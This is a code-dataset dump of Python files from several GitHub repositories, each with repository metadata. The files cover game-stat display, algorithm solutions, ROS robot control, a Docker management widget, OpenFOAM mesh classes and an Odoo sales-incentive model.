self.attrValues.update(self.stuff.chargeModifiedAttributes)\r\n # When item for stats window no longer exists, don't change anything\r\n else:\r\n return\r\n\r\n def 
UpdateList(self):\r\n self.Freeze()\r\n self.paramList.ClearAll()\r\n self.PopulateList()\r\n self.Thaw()\r\n self.paramList.resizeLastColumn(100)\r\n\r\n def RefreshValues(self, event):\r\n self._fetchValues()\r\n self.UpdateList()\r\n event.Skip()\r\n\r\n def ToggleViewMode(self, event):\r\n self.toggleView *= -1\r\n self.UpdateList()\r\n event.Skip()\r\n\r\n def ExportItemStats(self, event):\r\n exportFileName = self.item.name + \" (\" + str(self.item.ID) + \").csv\"\r\n\r\n saveFileDialog = wx.FileDialog(self, \"Save CSV file\", \"\", exportFileName,\r\n \"CSV files (*.csv)|*.csv\", wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)\r\n\r\n if saveFileDialog.ShowModal() == wx.ID_CANCEL:\r\n return # the user hit cancel...\r\n\r\n with open(saveFileDialog.GetPath(), \"wb\") as exportFile:\r\n writer = csv.writer(exportFile, delimiter=',')\r\n\r\n writer.writerow(\r\n [\r\n \"ID\",\r\n \"Internal Name\",\r\n \"Friendly Name\",\r\n \"Modified Value\",\r\n \"Base Value\",\r\n ]\r\n )\r\n\r\n for attribute in self.attrValues:\r\n\r\n try:\r\n attribute_id = self.attrInfo[attribute].ID\r\n except (KeyError, AttributeError):\r\n attribute_id = ''\r\n\r\n try:\r\n attribute_name = self.attrInfo[attribute].name\r\n except (KeyError, AttributeError):\r\n attribute_name = attribute\r\n\r\n try:\r\n attribute_displayname = self.attrInfo[attribute].displayName\r\n except (KeyError, AttributeError):\r\n attribute_displayname = ''\r\n\r\n try:\r\n attribute_value = self.attrInfo[attribute].value\r\n except (KeyError, AttributeError):\r\n attribute_value = ''\r\n\r\n try:\r\n attribute_modified_value = self.attrValues[attribute].value\r\n except (KeyError, AttributeError):\r\n attribute_modified_value = self.attrValues[attribute]\r\n\r\n writer.writerow(\r\n [\r\n attribute_id,\r\n attribute_name,\r\n attribute_displayname,\r\n attribute_modified_value,\r\n attribute_value,\r\n ]\r\n )\r\n\r\n def PopulateList(self):\r\n self.paramList.InsertColumn(0, \"Attribute\")\r\n self.paramList.InsertColumn(1, \"Current Value\")\r\n if self.stuff is not None:\r\n self.paramList.InsertColumn(2, \"Base Value\")\r\n self.paramList.SetColumnWidth(0, 110)\r\n self.paramList.SetColumnWidth(1, 90)\r\n if self.stuff is not None:\r\n self.paramList.SetColumnWidth(2, 90)\r\n self.paramList.setResizeColumn(0)\r\n self.imageList = wx.ImageList(16, 16)\r\n self.paramList.SetImageList(self.imageList, wx.IMAGE_LIST_SMALL)\r\n\r\n names = list(self.attrValues.iterkeys())\r\n names.sort()\r\n\r\n idNameMap = {}\r\n idCount = 0\r\n for name in names:\r\n info = self.attrInfo.get(name)\r\n att = self.attrValues[name]\r\n\r\n valDefault = getattr(info, \"value\", None)\r\n valueDefault = valDefault if valDefault is not None else att\r\n\r\n val = getattr(att, \"value\", None)\r\n value = val if val is not None else att\r\n\r\n if info and info.displayName and self.toggleView == 1:\r\n attrName = info.displayName\r\n else:\r\n attrName = name\r\n\r\n if info and config.debug:\r\n attrName += \" ({})\".format(info.ID)\r\n\r\n if info:\r\n if info.icon is not None:\r\n iconFile = info.icon.iconFile\r\n icon = BitmapLoader.getBitmap(iconFile, \"icons\")\r\n\r\n if icon is None:\r\n icon = BitmapLoader.getBitmap(\"transparent16x16\", \"gui\")\r\n\r\n attrIcon = self.imageList.Add(icon)\r\n else:\r\n attrIcon = self.imageList.Add(BitmapLoader.getBitmap(\"7_15\", \"icons\"))\r\n else:\r\n attrIcon = self.imageList.Add(BitmapLoader.getBitmap(\"7_15\", \"icons\"))\r\n\r\n index = self.paramList.InsertImageStringItem(sys.maxint, attrName, attrIcon)\r\n 
idNameMap[idCount] = attrName\r\n self.paramList.SetItemData(index, idCount)\r\n idCount += 1\r\n\r\n if self.toggleView != 1:\r\n valueUnit = str(value)\r\n elif info and info.unit:\r\n valueUnit = self.TranslateValueUnit(value, info.unit.displayName, info.unit.name)\r\n else:\r\n valueUnit = formatAmount(value, 3, 0, 0)\r\n\r\n if self.toggleView != 1:\r\n valueUnitDefault = str(valueDefault)\r\n elif info and info.unit:\r\n valueUnitDefault = self.TranslateValueUnit(valueDefault, info.unit.displayName, info.unit.name)\r\n else:\r\n valueUnitDefault = formatAmount(valueDefault, 3, 0, 0)\r\n\r\n self.paramList.SetStringItem(index, 1, valueUnit)\r\n if self.stuff is not None:\r\n self.paramList.SetStringItem(index, 2, valueUnitDefault)\r\n\r\n self.paramList.SortItems(lambda id1, id2: cmp(idNameMap[id1], idNameMap[id2]))\r\n self.paramList.RefreshRows()\r\n self.totalAttrsLabel.SetLabel(\"%d attributes. \" % idCount)\r\n self.Layout()\r\n\r\n @staticmethod\r\n def TranslateValueUnit(value, unitName, unitDisplayName):\r\n def itemIDCallback():\r\n item = Market.getInstance().getItem(value)\r\n return \"%s (%d)\" % (item.name, value) if item is not None else str(value)\r\n\r\n def groupIDCallback():\r\n group = Market.getInstance().getGroup(value)\r\n return \"%s (%d)\" % (group.name, value) if group is not None else str(value)\r\n\r\n def attributeIDCallback():\r\n if not value: # some attributes come through with a value of 0? See #1387\r\n return \"%d\" % (value)\r\n attribute = Attribute.getInstance().getAttributeInfo(value)\r\n return \"%s (%d)\" % (attribute.name.capitalize(), value)\r\n\r\n trans = {\r\n \"Inverse Absolute Percent\" : (lambda: (1 - value) * 100, unitName),\r\n \"Inversed Modifier Percent\": (lambda: (1 - value) * 100, unitName),\r\n \"Modifier Percent\" : (\r\n lambda: (\"%+.2f\" if ((value - 1) * 100) % 1 else \"%+d\") % ((value - 1) * 100), unitName),\r\n \"Volume\" : (lambda: value, u\"m\\u00B3\"),\r\n \"Sizeclass\" : (lambda: value, \"\"),\r\n \"Absolute Percent\" : (lambda: (value * 100), unitName),\r\n \"Milliseconds\" : (lambda: value / 1000.0, unitName),\r\n \"typeID\" : (itemIDCallback, \"\"),\r\n \"groupID\" : (groupIDCallback, \"\"),\r\n \"attributeID\" : (attributeIDCallback, \"\")\r\n }\r\n\r\n override = trans.get(unitDisplayName)\r\n if override is not None:\r\n v = override[0]()\r\n if isinstance(v, str):\r\n fvalue = v\r\n elif isinstance(v, (int, float, long)):\r\n fvalue = formatAmount(v, 3, 0, 0)\r\n else:\r\n fvalue = v\r\n return \"%s %s\" % (fvalue, override[1])\r\n else:\r\n return \"%s %s\" % (formatAmount(value, 3, 0), unitName)\r\n","repo_name":"Bloodysigg/pyfa","sub_path":"gui/builtinItemStatsViews/itemAttributes.py","file_name":"itemAttributes.py","file_ext":"py","file_size_in_byte":11035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70171110633","text":"class Solution:\n def minWindow(self, s: str, t: str) -> str:\n memory, left, res = collections.defaultdict(int), 0, [0, sys.maxsize]\n cur_size = 0\n \n for char in t:\n memory[char] += 1\n\n for right, cur_char in enumerate(s):\n if cur_char in memory:\n memory[cur_char] -= 1\n\n if memory[cur_char] == 0:\n cur_size += 1\n \n while cur_size == len(memory):\n cur_len = right - left\n prev_len = res[1] - res[0]\n\n if cur_len < prev_len:\n res[0] = left\n res[1] = right\n \n left_char = s[left]\n if left_char in memory:\n if memory[left_char] == 0:\n cur_size -= 1\n memory[left_char] += 1\n left += 1\n \n if res[1] == 
sys.maxsize:\n            return \"\"\n        \n        return s[res[0]:res[1] + 1]","repo_name":"IhorPeresunko/YouTube","sub_path":"leetcode/76.py","file_name":"76.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"2489144898","text":"#!/usr/bin/env python3\nimport rospy\nfrom loa_bot.msg import Obstacle\nfrom geometry_msgs.msg import Twist\n\n# Callback method for the obstacle_detector subscriber\ndef obstacle_avoidance(Obstacle: Obstacle):\n    \n    # Output obstacle info to console\n    rospy.loginfo(\"Obstacle distance: \" + str(Obstacle.distance) + \"m\")\n    rospy.loginfo(\"Obstacle angle: \" + str(Obstacle.angle) + \" degrees\")\n\n    # Continue traveling forward if object further than 0.25m\n    if (Obstacle.distance > 0.25):\n        cmd_vel_msg.linear.x = 0.15\n        cmd_vel_msg.angular.z = 0.0\n\n    # If the object is less than 0.25m away, stop moving forward and rotate until the object is behind the robot\n    elif (Obstacle.distance <= 0.25):\n        if (Obstacle.angle > 90 and Obstacle.angle < 270): # Checks if object is behind\n            cmd_vel_msg.linear.x = 0.15\n            cmd_vel_msg.angular.z = 0.0\n        \n        if (Obstacle.angle >= 0 and Obstacle.angle < 90): # Check if the object is to the left of the robot\n            cmd_vel_msg.linear.x = 0.0\n            cmd_vel_msg.angular.z = -1\n\n        if (Obstacle.angle > 270 and Obstacle.angle < 360): # Check if the object is to the right of the robot\n            cmd_vel_msg.linear.x = 0.0\n            cmd_vel_msg.angular.z = 1\n    \n    cmd_vel_pub.publish(cmd_vel_msg) # Publish the updated velocity commands\n    \n\nif __name__ == \"__main__\":\n    try:\n        rospy.init_node(\"roaming_controller\")\n        rospy.loginfo(\"roaming_controller node is activated\")\n        \n        cmd_vel_pub = rospy.Publisher('cmd_vel', Twist, queue_size=10)\n        obstacle_sub = rospy.Subscriber('obstacle_data', Obstacle, callback=obstacle_avoidance)\n        \n        cmd_vel_msg = Twist()\n        \n        rospy.spin()\n    except rospy.ROSInterruptException:\n        pass","repo_name":"MunninZ/LiDAR-Obstacle-Avoidance-Robot","sub_path":"scripts/roaming_controller.py","file_name":"roaming_controller.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"15068970249","text":"n, m = map(int,input().split())\r\n\r\na = [0] * m\r\nb = [0] * m\r\nc = [0] * m\r\n\r\nfor i in range(0,m):\r\n    a[i], b[i], c[i] = map(int,input().split())\r\n    a[i] = a[i] - 1\r\n    b[i] = b[i] - 1\r\n    c[i] = -c[i]\r\n\r\nINF = (n-1) * max(abs(min(c)),abs(max(c)))\r\n\r\ndist = [INF] * n\r\n\r\ndist[0] = 0\r\n\r\nfor j in range(0,n-1):\r\n    for i in range(0,m):\r\n        if dist[a[i]] == INF:\r\n            continue\r\n        dist[b[i]] = min(dist[b[i]], dist[a[i]] + c[i])\r\n\r\nans = - dist[n-1]\r\n\r\nnegative = [False] * n\r\n\r\nfor j in range(0,n):\r\n    for i in range(0,m):\r\n        if dist[a[i]] == INF:\r\n            continue\r\n        if negative[a[i]]:\r\n            negative[b[i]] = True\r\n        elif dist[a[i]] + c[i] < dist[b[i]]:\r\n            dist[b[i]] = dist[a[i]] + c[i]\r\n            negative[b[i]] = True\r\n\r\nif negative[n-1]:\r\n    print(\"inf\")\r\nelse:\r\n    print(ans)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc061/D/4724112.py","file_name":"4724112.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"}
+{"seq_id":"21578713849","text":"import time\n\nclass pd_controller:\n\n    def __init__(self, setpoint = 1, kp = 1, kd = 1, derivative_samples = 3):\n        self.setpoint = setpoint\n        self._der = 0\n        self.kp = kp\n        self.kd = kd\n        self.derivative_samples = derivative_samples  # honor the constructor argument\n        self._curtime = time.time()\n        self._history = [0 for i in range(self.derivative_samples)]\n        self._history_times = [0 for i in range(self.derivative_samples)]\n\n\n    def _calc_der(self):\n        self._der = 0\n        c = 0\n        for i in range(len(self._history)-1):\n            for j in range(i + 1, len(self._history)):\n                if self._history_times[j] > self._history_times[i]:\n                    self._der += self._history[j] - self._history[i]\n                    c+=1\n        self._der /= float(c)\n\n\n    def pd_out(self, out):\n        self._history.pop(0)\n        self._history.append(out - self.setpoint)\n        self._history_times.pop(0)\n        self._history_times.append(time.time())\n        self._calc_der()\n        return self.kp*self._history[-1] + self.kd*self._der\n\n    def reset(self, sp):\n        self.setpoint = sp\n        self._der = 0\n        self._curtime = time.time()\n        self._history = [0 for i in range(self.derivative_samples)]\n        self._history_times = [0 for i in range(self.derivative_samples)]\n\n\nif __name__ == \"__main__\":\n    from matplotlib import pyplot as plt\n    mypd = pd_controller(kp = 0.01, kd = 5)\n    t = [i for i in range(3000)]\n    x = [0]\n    dt = 0.001\n    err = 0.1\n    vel = 0\n    for i in t[1:]:\n        out = mypd.pd_out(x[-1])\n        vel += out\n        x.append(x[-1] + vel*dt)\n        time.sleep(dt)\n    plt.plot(t,x)\n    plt.show()\n","repo_name":"ABakirtzis/RoboticsProject","sub_path":"wall_following/scripts/pdcon.py","file_name":"pdcon.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"12243249075","text":"# In Python, lambdas are anonymous functions.\n\npurchase = (\n    {'quantity': 2, 'price': 10},\n    {'quantity': 3, 'price': 20},\n    {'quantity': 5, 'price': 30},\n)\n\n\n# traditional method\ndef calc_price_total(purch): return purch['quantity'] * purch['price']\n\n\ntotals = tuple(map(calc_price_total, purchase))\n\n# with lambda\ntotals_lambda = tuple(\n    map(lambda purch: purch['quantity'] * purch['price'], purchase))\n\nprint(totals_lambda) # (20, 60, 150)\nprint(sum(totals_lambda)) # 230\n","repo_name":"lucas-silveira/python-fundamentals","sub_path":"Advanced Functions/lambda.py","file_name":"lambda.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"18667154774","text":"import ipywidgets as widgets\nimport docker\nfrom traitlets import Dict, List, observe, Unicode\n\n@widgets.register\nclass DockerManager(widgets.DOMWidget):\n\n    \"\"\"\"\"\"\n    _view_name = Unicode('DockerView').tag(sync=True)\n    _model_name = Unicode('DockerModel').tag(sync=True)\n    _view_module = Unicode('ipydocker').tag(sync=True)\n    _model_module = Unicode('ipydocker').tag(sync=True)\n    _view_module_version = Unicode('^0.1.0').tag(sync=True)\n    _model_module_version = Unicode('^0.1.0').tag(sync=True)\n\n    _cli = docker.APIClient(base_url='unix:///var/run/docker.sock')\n    # docker_version = Unicode(_cli.version()['Version']).tag(sync=True)\n    docker_info = Dict().tag(sync=True)\n    command = Unicode('').tag(sync=True)\n    containers = List().tag(sync=True)\n    images = List().tag(sync=True)\n    parameters = Dict().tag(sync=True)\n\n    @observe(\"command\")\n    def _on_command_change(self, changed):\n        self.command = changed['new']\n        if self.command == 'ps':\n            self.containers = []\n            self.containers = self._cli.containers()\n        elif self.command == 'images':\n            self.images = []\n            self.images = self._cli.images()\n        elif self.command == 'create':\n            self._create_container()\n        elif self.command == 'remove':\n            self._remove_container()\n        elif 
self.command == 'info':\n self.docker_info = self._cli.info()\n\n def _create_container(self):\n volumes = {'/var/run/docker.sock': '/var/run/docker.sock',\n self.parameters['host']: self.parameters['container']}\n ports = {int(self.parameters['internal']): int(self.parameters['external'])}\n\n binds = []\n for s, d in volumes.items():\n binds.append(s + \":\" + d)\n volumes = list(volumes.values())\n\n port_bindings = {}\n for i, e in ports.items():\n port_bindings[i] = e\n ports = list(ports.keys())\n\n host_config = self._cli.create_host_config(binds=binds, port_bindings=port_bindings)\n\n commands = ''\n if self.parameters['command']: \n commands = 'bash -c \"' + self.parameters['command'] + '\"'\n\n _containerId = self._cli.create_container(image=self.parameters['image'],\n volumes=volumes,\n ports=ports,\n command=commands,\n host_config=host_config)\n\n self._cli.start(_containerId)\n self.containers = []\n self.containers = self._cli.containers()\n\n def _remove_container(self):\n if self.parameters['containerId']:\n self._cli.stop(self.parameters['containerId'])\n try:\n self._cli.remove_container(self.parameters['containerId'], force=True)\n except:\n pass\n \n self.containers = []\n self.containers = self._cli.containers()\n","repo_name":"JMHOO/nbdocker","sub_path":"ipydocker/ipydocker/docker.py","file_name":"docker.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70145791272","text":"repolist = []\nfrom req import GithubRequester\ndef getallrepo(token):\n x = 1\n rep = GithubRequester()\n while rep.rest_request(\"GET\", \"https://api.github.com/orgs/performgroup/repos?page={}&per_page=50\".format(x), token) != []:\n responses = rep.rest_request(\"GET\", \"https://api.github.com/orgs/performgroup/repos?page={}&per_page=50\".format(x), token)\n for i in range (len(responses)):\n if (responses[i]['size']) == 0:\n print(\"empty repo\")\n print (responses[i]['name'])\n else:\n repolist.append(responses[i]['name'])\n x=x+1\n print(repolist)\n print(len(repolist))\n\n","repo_name":"rexius41/test_ness","sub_path":"allrep.py","file_name":"allrep.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15149753639","text":"#!/usr/bin/env python3\n\nimport datetime\n\ndef main():\n n = int(input())\n md = []\n for i in range(n):\n m, d = map(int, input().split(\"/\"))\n md.append((m, d))\n md = sorted(md)\n\n stored = 0\n streak = 0\n ma_streak = 0\n dt = datetime.datetime(2012, 1, 1) - datetime.timedelta(1)\n for i in range(366):\n dt += datetime.timedelta(1)\n is_holiday = (dt.month, dt.day) in md\n is_yasumi, stored = advance(dt, stored, is_holiday)\n if is_yasumi:\n streak += 1\n ma_streak = max(ma_streak, streak)\n else:\n streak = 0\n\n print(ma_streak)\n\ndef advance(today, stored, is_holiday):\n if is_weekend(today):\n stored += 1\n if is_holiday:\n stored += 1\n if stored > 0:\n is_yasumi = True\n stored -= 1\n else:\n is_yasumi = False\n return is_yasumi, stored\n\ndef is_weekend(today):\n return today.weekday() in [5, 6]\n\nmain()","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc010/B/3305445.py","file_name":"3305445.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"73285149353","text":"\"\"\"Building blocks for a blockMeshDict\"\"\"\n\nimport 
re, os\nimport copy\nimport math\nfrom PyFoam.Basics.LineReader import LineReader\nfrom PyFoam.RunDictionary.FileBasis import FileBasisBackup\nfrom PyFoam.RunDictionary.BlockMesh import BlockMesh\nfrom PyFoam.RunDictionary.ParsedBlockMeshDict import ParsedBlockMeshDict\nfrom PyFoam.Basics.DataStructures import *\nfrom math import ceil\nfrom PyFoam.Error import error\n\nclass BlockMeshComponent(object):\n    def __init__(self, dimension):\n        self.dimension=dimension\n\nclass BlockMeshEdge(BlockMeshComponent):\n    def __init__(self, start, end, center, points):\n        self.start=start\n        self.end=end\n        self.center=center\n        self.points=copy.deepcopy(points)\n        if(center is None and points is not None):\n            self.edgeType='spline'\n        else:\n            self.edgeType='arc'\n\n    def __repr__(self):\n        result=\"\"\n        if self.edgeType=='spline':\n            result='\\t'+\"spline\"+' '+str(self.start)+' '+str(self.end)+\"\\n\\t(\"\n            for point in self.points:\n                result+='\\n\\t\\t\\t'+\"(\"+' '.join(str(n) for n in point)+ \")\"\n            result+='\\n\\t'+\")\"\n        elif self.edgeType=='arc':\n            result='\\t'+\"arc\"+' '+str(self.start)+' '+str(self.end)+\" (\"+' '.join(str(n) for n in self.center)+ \")\"\n        return result\n    def __str__(self):\n        result=\"\"\n        if self.edgeType=='spline':\n            result='\\t'+\"spline\"+' '+str(self.start)+' '+str(self.end)+\"\\n\\t(\"\n            for point in self.points:\n                result+='\\n\\t\\t\\t'+str(point)\n            result+='\\n\\t'+\")\"\n        elif self.edgeType=='arc':\n            result='\\t'+\"arc\"+' '+str(self.start)+' '+str(self.end)+' '+str(self.center)\n        return result\n\nclass BlockMeshBoundary(BlockMeshComponent):\n    def __init__(self, name, boundaryType, faces):\n        self.name=name\n        self.boundaryType=boundaryType\n        self.faces=faces\n\n    def __repr__(self):\n        result='\\t'+self.name+'\\n\\t'+\"{\"+'\\n\\t\\t'+\"type \"+self.boundaryType+\";\"+'\\n\\t\\t'+\"faces\"+\"\\n\\t\\t(\"\n        for face in self.faces:\n            result+='\\n\\t\\t\\t'+\"(\"+' '.join(str(n) for n in face)+ \")\"\n        result+='\\n\\t\\t'+\");\"+\"\\n\\t}\"\n        return result\n    def __str__(self):\n        result='\\t'+self.name+'\\n\\t'+\"{\"+'\\n\\t\\t'+\"type \"+self.boundaryType+\";\"+'\\n\\t\\t'+\"faces\"+\"\\n\\t\\t(\"\n        for face in self.faces:\n            result+='\\n\\t\\t\\t'+\"(\"+' '.join(str(n) for n in face)+ \")\"\n        result+='\\n\\t\\t'+\");\"+\"\\n\\t}\"\n        return result\n\nclass BlockMeshVertex(BlockMeshComponent):\n    def __init__(self,origin,coordinates):\n        self.coordinates=coordinates\n        self.origin=origin\n        if(len(self.coordinates) == 2):\n            self.dimension=2\n        elif(len(coordinates) == 3):\n            self.dimension=3\n        else:\n            self.dimension=None\n\n    def extend(self,extensionType,value):\n        newvertex=copy.deepcopy(self)\n        if(extensionType == \"EXTRUDE\"):\n            newvertex.coordinates.append(value)\n        elif(extensionType == \"ROTATEY\"):\n            newvertex.coordinates.append(\n                abs(self.coordinates[0]-self.origin[0])\n                *\n                math.sin(math.radians(value)))\n        elif(extensionType == \"ROTATEX\"):\n            newvertex.coordinates.append(\n                abs(self.coordinates[1]-self.origin[1])\n                *\n                math.sin(math.radians(value)))\n        return newvertex\n    def __str__(self):\n        result=\"(\"+' '.join(str(n) for n in self.coordinates)+ \")\"\n        return result\n","repo_name":"nextfoam/baram","sub_path":"PyFoam/Basics/BlockMeshComponents.py","file_name":"BlockMeshComponents.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"72"}
+{"seq_id":"41844272605","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import datetime, timedelta\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import UserError\n\ndef get_years():\n    year_list = []\n    for i in range(2016, 2036):\n        year_list.append((i, str(i)))\n    return year_list\n\n\nclass SaleIncentive(models.Model):\n    _name = 'sale.incentive'\n    _description = \"Sale Incentive\"\n\n    name = fields.Char(string=\"Incentive Name\", readonly=True, required=True, copy=False, default='New')\n    region = fields.Many2one('region.incentive', string=\"Region\")\n    seller = fields.Many2one('res.partner', string=\"Seller\")\n    supervisor = fields.Many2one('res.partner', string=\"Supervisor\")\n    partner_id = fields.Many2one('res.partner', string='Customer', readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, required=True, change_default=True, index=True, track_visibility='always', track_sequence=1, help=\"You can find a customer by its Name, TIN, Email or Internal Reference.\")\n    company_id = fields.Many2one('res.company', 'Company', default=lambda self: self.env['res.company']._company_default_get('sale.incentive'))\n    user_id = fields.Many2one('res.users', string='Salesperson', index=True, track_visibility='onchange', track_sequence=2, default=lambda self: self.env.user)\n    sequence_id = fields.Many2one('ir.sequence',\n                                  required=True,\n                                  )\n    is_supervisor = fields.Boolean()\n    is_seller = fields.Boolean()\n    total_region = fields.Many2many('res.country', string=\"Total region\")\n    month = fields.Selection([(1, 'January'), (2, 'February'), (3, 'March'), (4, 'April'),\n                              (5, 'May'), (6, 'June'), (7, 'July'), (8, 'August'),\n                              (9, 'September'), (10, 'October'), (11, 'November'), (12, 'December')], string='Month')\n    year = fields.Selection(get_years(), string='Year')\n    maximum_bonus = fields.Many2one('sale.bonuses', string=\"Maximum Bonus\") # Maximum bonus\n    brand_line_objectives_ids = fields.One2many('brand.objectives', \"sale_incentive_id\",\n                                                string=\"Brand Lines with Objectives\")\n    state = fields.Selection(\n        [('incentive_reg', 'Incentive Registration'),\n         ('incentive_sent', 'Incentive Sent'),\n         ('incentive_approved', 'Incentive Approved'),\n         ('incentive_cancel', 'Incentive Cancelled'),\n         ], string='State', default='incentive_reg')\n\n    month_year = fields.Char(string='Month/Year', compute='_compute_month_year', store=True)\n\n    brands_objective = fields.Integer(string=\"N° Brands with Objectives\")\n    bonus_x_boxes = fields.Many2one('sale.bonuses', string='Bonus for Boxes')\n    bonus_x_bs = fields.Many2one('sale.bonuses', string='Bonus for Bs')\n    bonus_x_qualitative = fields.Many2one('sale.bonuses', string='Bonus for Qualitative')\n    bonus_brand_boxes = fields.Float(string='Bonus for Box Brands', digits=(12, 6))\n    maximum_charge = fields.Float(string='Maximum % To Charge', digits=(12, 6))\n\n    bonus_x_boxes_total = fields.Float()\n    bonus_x_bs_total = fields.Float()\n    bonus_x_qualitative_total = fields.Float()\n\n    total_cupor_for_boxes = fields.Float(string=\"Total Coupon for boxes\") # Total quota in boxes\n    total_space_in_bs = fields.Float(string=\"Total Coupon in Bs\") # Total quota in Bs\n    total_sale_by_box = fields.Float(string=\"Total Sale by Boxes\") # Total sales in boxes\n    total_sale_in_bs = fields.Float(string=\"Total Sale in Bs.\") # Total sales in Bs\n    total_charged_by_box = fields.Float(string=\"Total Charge by Box.\") # Total charge per box\n\n    achievement_percent = fields.Float(string=\"% Achievement\")\n    achievement_to_collect_percent = fields.Float(string=\"% Achievement to Collect\")\n    incentive_bs = fields.Float(string=\"Incentive in BS\")\n    incentive_x_box = fields.Float(string=\"Incentive by Box\")\n    total_incentive = fields.Float(string=\"Total Incentive\")\n    approved_date = fields.Datetime(string='Approved Date', readonly=True, index=True, help=\"Date on which the incentive is confirmed.\", copy=False)\n    \n    @api.onchange('supervisor')\n    def _is_supervisor(self):\n        if self.supervisor:\n            self.is_supervisor = True\n            self.partner_id = self.supervisor\n    \n    @api.onchange('seller')\n    def _is_seller(self):\n        if self.seller:\n            self.is_seller = True\n            self.partner_id = self.seller\n\n    @api.onchange('brand_line_objectives_ids')\n    def count(self):\n        bo = len(self.mapped('brand_line_objectives_ids'))\n        self.brands_objective = bo\n\n    @api.depends('month','year')\n    def _compute_month_year(self):\n        for rec in self:\n            month_sel = dict(rec._fields['month'].selection).get(rec.month)\n            year_sel = rec.year\n\n            if(month_sel and year_sel):\n                rec.month_year = f\"{month_sel} {year_sel}\"\n            elif(month_sel):\n                rec.month_year = f\"{month_sel}\"\n            else:\n                rec.month_year = f\"{year_sel}\"\n    \n    @api.onchange('bonus_x_boxes')\n    def calc_bonus_x_boxes_total(self):\n        mb = self.maximum_bonus.amount\n        amount = self.bonus_x_boxes.amount/100\n\n        if(mb == 0 and amount > 0):\n            return{\n                'warning':{\n                    'title':'Maximum Bonus not typed',\n                    'message':'Maximum Bonus must be typed'\n                }\n            }\n        else:\n            self.bonus_x_boxes_total = mb * amount\n    \n    @api.onchange('bonus_x_bs')\n    def calc_bonus_x_bs_total(self):\n        mb = self.maximum_bonus.amount\n        amount = self.bonus_x_bs.amount/100\n\n        if(mb == 0 and amount > 0):\n            return{\n                'warning':{\n                    'title':'Maximum Bonus not typed',\n                    'message':'Maximum Bonus must be typed'\n                }\n            }\n        else:\n            self.bonus_x_bs_total = mb * amount\n\n    @api.onchange('bonus_x_qualitative')\n    def calc_bonus_x_qualitative_total(self):\n        mb = self.maximum_bonus.amount\n        amount = self.bonus_x_qualitative.amount/100\n\n        if(mb == 0 and amount > 0):\n            return{\n                'warning':{\n                    'title':'Maximum Bonus not typed',\n                    'message':'Maximum Bonus must be typed'\n                }\n            }\n        else:\n            self.bonus_x_qualitative_total = mb * amount\n\n    @api.onchange('brand_line_objectives_ids')\n    def calc_bonus_brand_boxes(self):\n        if len(self.mapped('brand_line_objectives_ids')) > 0:\n            if self.brands_objective > 0:\n                self.bonus_brand_boxes = self.maximum_bonus.amount/self.brands_objective\n        \n\n    @api.onchange('brand_line_objectives_ids')\n    def totals_lines_objectives(self):\n        if len(self.mapped('brand_line_objectives_ids')) > 0:\n            for rec in self.mapped('brand_line_objectives_ids'):\n                self.total_cupor_for_boxes = self.total_cupor_for_boxes + rec.cupor_for_boxes\n                self.total_space_in_bs = self.total_space_in_bs + rec.space_in_bs\n                self.total_sale_by_box = self.total_sale_by_box + rec.sale_by_box\n                self.total_sale_in_bs = self.total_sale_in_bs + rec.sale_in_bs\n                self.total_charged_by_box = self.total_charged_by_box + rec.charged_for_box\n\n            if self.total_space_in_bs > 0:\n                self.achievement_percent = self.total_sale_in_bs/(self.total_space_in_bs * 100)\n                self.achievement_to_collect_percent = self.achievement_percent\n\n            self.incentive_bs = self.achievement_to_collect_percent * self.bonus_x_bs_total\n            self.incentive_x_box = self.total_charged_by_box\n            self.total_incentive = self.incentive_bs + self.incentive_x_box\n\n    @api.multi\n    def action_cancel(self):\n        return self.write({'state': 'incentive_sent'})\n\n    @api.multi\n    def action_confirm(self):\n        if self._get_forbidden_state_confirm() & set(self.mapped('state')):\n            raise UserError(_(\n                'It is not allowed to confirm an incentive in the following states: %s'\n            ) % (', '.join(self._get_forbidden_state_confirm())))\n\n        self.write({\n            'state': 'incentive_approved',\n            'approved_date': fields.Datetime.now()\n        })\n\n        # Context key 'default_name' is sometimes propagated up to here.\n        # We don't need it and it creates issues in the creation of linked records.\n        context = self._context.copy()\n        context.pop('default_name', None)\n\n        self.with_context(context)._action_confirm()\n        if self.env['ir.config_parameter'].sudo().get_param('sale.auto_done_setting'):\n            self.action_done()\n        return True\n\n    def _get_forbidden_state_confirm(self):\n        return {'incentive_cancel'}\n    \n    @api.multi\n    def print_incentive(self):\n        return self.env.ref('sales_modification.action_incentive_report')\\\n            .with_context(discard_logo_check=True).report_action(self)\n\n    @api.multi\n    def action_incentive_send(self):\n        self.ensure_one()\n        ir_model_data = self.env['ir.model.data']\n        try:\n            template_id = ir_model_data.get_object_reference('sales_modification', 'sale_incentive_email_template')[1]\n        except ValueError:\n            template_id = False\n        try:\n            compose_form_id = ir_model_data.get_object_reference('mail', 'email_compose_message_wizard_form')[1]\n        except ValueError:\n            